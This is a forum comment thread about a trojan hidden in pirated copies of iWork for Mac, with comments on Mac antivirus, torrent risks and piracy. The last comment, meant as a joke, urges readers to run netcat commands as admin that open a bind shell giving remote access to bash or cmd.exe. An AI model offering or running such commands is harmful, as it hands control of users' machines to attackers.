But... (2, Interesting)

alienunknown (1279178) | more than 5 years ago | (#26570207)

From the article:

Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.

Most antivirus programs on OS X actually scan for Windows viruses only, and are totally useless against almost all OS X malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the Mac users out there who get a Mac virus scanner that only scans for Windows viruses? A lot of people are being duped.

CrimeWire and RootKitaZa! (1)

thecoolbean (454867) | more than 5 years ago | (#26570231)

w4r3z n00bz abound in every user base, Mac is no exception. Hooray for learning experiences!

Re:CrimeWire and RootKitaZa! (-1, Troll)

Anonymous Coward | more than 5 years ago | (#26570357)

I am just surprised that there is actually enough Mac software for there to even be a pirate community for it.

Obviously, it's a secret SDK (1)

thered2001 (1257950) | more than 5 years ago | (#26570287)

"TrojanDevKit.DMG" - available only to 'special developers'. From the EULA: "Only to be used on occasions when our IP is getting ripped to the point we get irritated. Break glass in case of emergency."

Makes Sense (0)

Anonymous Coward | more than 5 years ago | (#26570315)

Overall, 98% of the owned systems are Windows. Cracking into *nix with a virus is just not going to occur (though I see LOADS of attempts at ssh and lots of .cfm, .asp and .php attacks going on). Instead, it has to be something that fools will load in. iWork is one of them.

Get a Mac, duh. (2, Funny)

ArbiterShadow (1222388) | more than 5 years ago | (#26570429)

Lol viruses? Get a Mac. Oh wait.

I am surprised we don't hear this more often (1)

quax (19371) | more than 5 years ago | (#26570485)

I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.

With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untampered original version. On the other hand, if there is an exploitable vulnerability in a popular codec, movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).

Re:I am surprised we don't hear this more often (0)

Anonymous Coward | more than 5 years ago | (#26570805)

Read up on all the recent QuickTime flaws...

Not like it used to be... (1)

youcantwin (1459567) | more than 5 years ago | (#26570511)

You really can't trust pirates anymore!

!news (0)

Anonymous Coward | more than 5 years ago | (#26570599)

Software from an untrusted source is not secure, news at 11!

Seriously, why would you think that any pirated software is secure? Hell, it's provided by people who don't mind stealing software. What makes you think they would not want to steal from you?

Re:!news (1)

plnix0 (807376) | more than 5 years ago | (#26570857)

It's not "provided by people who don't mind stealing software". It's provided by people with variable motivations, but some of whom provide it as an honest way to benefit others. None of them steal software, whatever their intentions may be.

Why not download directly from Apple? (4, Informative)

WiiVault (1039946) | more than 5 years ago | (#26570615)

I don't steal software, ever, but it is a well known fact (among Mac users) that iWork can be downloaded direct from Apple. All it takes is a valid serial number and you are ready to go. Why the heck would anybody bother firing up a torrent?

Bullshit (0)

Anonymous Coward | more than 5 years ago | (#26570631)

Let's have this independently verified. I'm sick unto death of Intego releasing these stupid "threat" notices, trying to scare people into buying their shitware.

RIAA (1)

britneys 9th husband (741556) | more than 5 years ago | (#26570689)

You know, if the RIAA had just used this approach from the beginning, instead of suing people at random, they could have avoided a ton of bad PR. Just another reason why Apple is smarter than other companies.

How is this news? (2, Insightful)

mysidia (191772) | more than 5 years ago | (#26570707)

Software programs downloaded from third-party pirate sites can contain trojans.

Film at 11!

It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.

I knew they'd installed Windows on Macs... (1)

plnix0 (807376) | more than 5 years ago | (#26570813)

but now they've managed to embed Windows inside a Mac program? Amazing.

Linux/Mac OS X trojan spreading through slashdot (1)

guruevi (827432) | more than 5 years ago | (#26570841)

Please execute the following as admin, type your password as requested:

sudo nc -l -p1234 -d -e bash-L

On Windows:

nc -l -p1234 -d -e cmd.exe -L

Oh noes, I ownz yoo box now.

(similar things can be done with reverse ssh tunneling but you get the point)
